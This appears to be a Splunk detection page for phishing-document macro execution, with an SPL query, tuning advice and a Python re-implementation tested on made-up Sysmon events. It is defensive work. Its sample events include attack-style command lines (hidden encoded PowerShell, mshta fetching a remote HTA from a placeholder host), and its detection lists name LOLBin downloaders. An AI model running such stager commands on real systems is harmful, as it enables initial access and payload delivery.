THREAT-InitialAccess-PhishingMacro Splunk · SPL

Detect Phishing Document Macro Execution and Initial Access in Splunk

Despite Microsoft's macro-blocking defaults (Office 2016 and later block VBA macros in files downloaded from the internet, on by default since 2022), phishing documents that execute macros remain a primary initial access vector against SMBs. Attackers have adapted: shipping documents inside ISO/IMG containers, whose extracted contents did not inherit the Mark-of-the-Web (MOTW) until Microsoft's November 2022 fix; using remote template injection (DOTM/XLTM); abusing OneNote .one files (embedded-file abuse blocked by Microsoft in 2023, resurfacing via .onepkg packages); and targeting users whose macro blocking has been turned off through Group Policy misconfiguration, or who can be talked into clicking 'Enable content to view this document'. QakBot successors (Pikabot, DarkGate), TA577 and Lazarus Group are documented using this technique against UK SMBs. An NCSC 2025 advisory noted that macro-based attacks persist in 40% of SMB ransomware intrusions due to inadequate macro restrictions.

MITRE ATT&CK

Tactics: Initial Access, Execution

SPL Detection Query

Splunk (SPL)

```spl
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(
  ParentImage IN ("*\\winword.exe", "*\\excel.exe", "*\\powerpnt.exe",
                  "*\\outlook.exe", "*\\onenote.exe", "*\\mspub.exe")
  AND Image IN ("*\\cmd.exe", "*\\powershell.exe", "*\\pwsh.exe",
                "*\\mshta.exe", "*\\wscript.exe", "*\\cscript.exe",
                "*\\regsvr32.exe", "*\\rundll32.exe", "*\\certutil.exe",
                "*\\bitsadmin.exe", "*\\curl.exe", "*\\schtasks.exe")
)
| eval ThreatType="Macro_SuspiciousChildProcess"
| eval HighRisk=if(
    match(Image, "(?i)(mshta|cscript|wscript|regsvr32|certutil|bitsadmin)"),
    "YES", "NO"
  )
| eval RiskScore=if(HighRisk="YES", 90, 75)
| eval ThreatActors="QakBot successor, Emotet, TA577, Lazarus"
| bin _time span=1h
| stats count AS Events,
        values(Image) AS ChildProcesses,
        values(CommandLine) AS CommandLines,
        max(RiskScore) AS MaxRisk
  BY _time, host, User, ParentImage
| sort - MaxRisk
```

Severity: High · Confidence: High

SPL phishing macro detection via Sysmon process-creation events (Event ID 1). It flags an Office application (Word, Excel, PowerPoint, Outlook, OneNote, Publisher) as the parent of a command interpreter, scripting host or LOLBin downloader, a parent/child pairing that normal document handling rarely produces and malicious macros almost always do. Children that can fetch and run a remote payload on their own (mshta, wscript/cscript, regsvr32, certutil, bitsadmin) are scored 90; cmd, PowerShell, rundll32, curl and schtasks are scored 75 and need the CommandLine to decide. Splunk matches field values case-insensitively, so Sysmon's upper-case Office paths (EXCEL.EXE) match the lower-case wildcards. Events are rolled up per host, user and parent image in one-hour buckets (`bin _time span=1h` before `stats`, since `stats` itself takes no `span`), so one document that spawns several children produces a single result with the highest score.

Data Sources

Sysmon via Windows Event Log

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Legitimate Office macros invoking cmd for file operations (copy/xcopy of reports, mapping a network drive): allowlist the exact CommandLine rather than the whole child process, or the exclusion will also hide cmd-launched stagers
  • Developer testing of VBA automation: scope the exclusion to known developer hosts or users instead of suppressing the rule
  • Scoring looks only at the child Image, so cmd.exe that immediately launches an encoded PowerShell command still scores 75; triage on CommandLines, not on MaxRisk alone
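To make the query's logic concrete, and to show how the CommandLine allowlisting in the tuning list above fits into it, here is an added Python re-implementation of the detection run over a handful of constructed Sysmon Event ID 1 records. This is example code written for this page, not the detection's own code or anything from Splunk; the events, hosts, users, paths and the `allowlist` parameter are all made up. It applies the same Office-parent/suspicious-child filter, the same 90/75 scoring on the child image, and the same per-host, per-user, per-parent one-hour roll-up as the SPL `bin` + `stats` stages, which is a handy way to confirm what a test should produce before running the query against live data.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Sysmon Event ID 1 records, using the field names the Splunk Sysmon
# add-on extracts. Made-up sample data, not captured telemetry.
SAMPLE_EVENTS = [
    {   # Word macro -> cmd -> encoded PowerShell (child is cmd, so scores 75)
        "_time": "2024-03-04T09:12:07+00:00", "EventCode": 1, "host": "WS01",
        "User": "CORP\\alice",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA",
    },
    {   # Same host/user/parent within the hour: wscript stager (scores 90)
        "_time": "2024-03-04T09:40:51+00:00", "EventCode": 1, "host": "WS01",
        "User": "CORP\\alice",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r"wscript.exe //E:jscript C:\Users\alice\AppData\Local\Temp\inv.js",
    },
    {   # Excel -> mshta fetching a remote HTA (scores 90)
        "_time": "2024-03-04T11:02:13+00:00", "EventCode": 1, "host": "WS07",
        "User": "CORP\\bob",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta.exe http://example.invalid/p.hta",
    },
    {   # Legitimate finance macro copying a report: the false positive to allowlist
        "_time": "2024-03-04T11:15:00+00:00", "EventCode": 1, "host": "WS07",
        "User": "CORP\\bob",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r'cmd.exe /c copy "\\fs01\reports\q1.xlsx" "C:\Users\bob\Desktop\"',
    },
    {   # Parent is not an Office application: ignored
        "_time": "2024-03-04T11:20:00+00:00", "EventCode": 1, "host": "WS07",
        "User": "CORP\\bob",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
    },
    {   # Office parent but a benign child: ignored
        "_time": "2024-03-04T11:25:00+00:00", "EventCode": 1, "host": "WS07",
        "User": "CORP\\bob",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": "chrome.exe https://example.invalid/",
    },
]

# Same lists as the SPL IN() clauses and the HighRisk match() regex.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                  "outlook.exe", "onenote.exe", "mspub.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                       "wscript.exe", "cscript.exe", "regsvr32.exe", "rundll32.exe",
                       "certutil.exe", "bitsadmin.exe", "curl.exe", "schtasks.exe"}
HIGH_RISK = re.compile(r"(?i)(mshta|cscript|wscript|regsvr32|certutil|bitsadmin)")


def basename(path: str) -> str:
    """Lower-cased final path component; Splunk's IN() wildcards match case-insensitively."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def risk_score(image: str) -> int:
    """Mirror the HighRisk/RiskScore evals: 90 for self-contained downloaders, else 75."""
    return 90 if HIGH_RISK.search(image) else 75


def detect(events, allowlist=()):
    """Filter, score and aggregate per (hour, host, User, ParentImage), like the
    `bin _time span=1h | stats ... | sort - MaxRisk` stages. `allowlist` (an
    assumed tuning knob, not part of the query) holds regexes over CommandLine."""
    allow = [re.compile(p) for p in allowlist]
    buckets = defaultdict(lambda: {"Events": 0, "ChildProcesses": set(),
                                   "CommandLines": set(), "MaxRisk": 0})
    for ev in events:
        if ev.get("EventCode") != 1:
            continue
        if basename(ev["ParentImage"]) not in OFFICE_PARENTS:
            continue
        if basename(ev["Image"]) not in SUSPICIOUS_CHILDREN:
            continue
        if any(a.search(ev["CommandLine"]) for a in allow):
            continue
        hour = datetime.fromisoformat(ev["_time"]).replace(minute=0, second=0, microsecond=0)
        b = buckets[(hour.isoformat(), ev["host"], ev["User"], ev["ParentImage"])]
        b["Events"] += 1
        b["ChildProcesses"].add(ev["Image"])
        b["CommandLines"].add(ev["CommandLine"])
        b["MaxRisk"] = max(b["MaxRisk"], risk_score(ev["Image"]))
    rows = [{"_time": k[0], "host": k[1], "User": k[2], "ParentImage": k[3],
             "Events": b["Events"], "ChildProcesses": sorted(b["ChildProcesses"]),
             "CommandLines": sorted(b["CommandLines"]), "MaxRisk": b["MaxRisk"]}
            for k, b in buckets.items()]
    return sorted(rows, key=lambda r: r["MaxRisk"], reverse=True)


if __name__ == "__main__":
    for row in detect(SAMPLE_EVENTS, allowlist=[r'copy "\\\\fs01\\reports\\']):
        print(row["MaxRisk"], row["host"], row["User"], row["Events"], row["ChildProcesses"])
```

With the allowlist applied, the run yields two rows: WS01 rolls the cmd and wscript children into one result at MaxRisk 90, and WS07 keeps only the mshta child, because the report-copy macro is tuned out by its full CommandLine rather than by suppressing cmd.exe as a child.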

Testing Methodology

Validate this detection against one adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see.

  1. Test 1: Office Macro Child Process Simulation (Excel)

    Expected signal: Sysmon Event ID 1 with ParentImage ending in excel.exe and Image ending in cmd.exe; parent process chain explorer.exe > excel.exe > cmd.exe. The event should surface in the query with RiskScore 75 (cmd.exe is not in the high-risk set). If it does not, confirm that the Sysmon configuration logs process creation for Office parents and that the events arrive under the sourcetype the query expects.
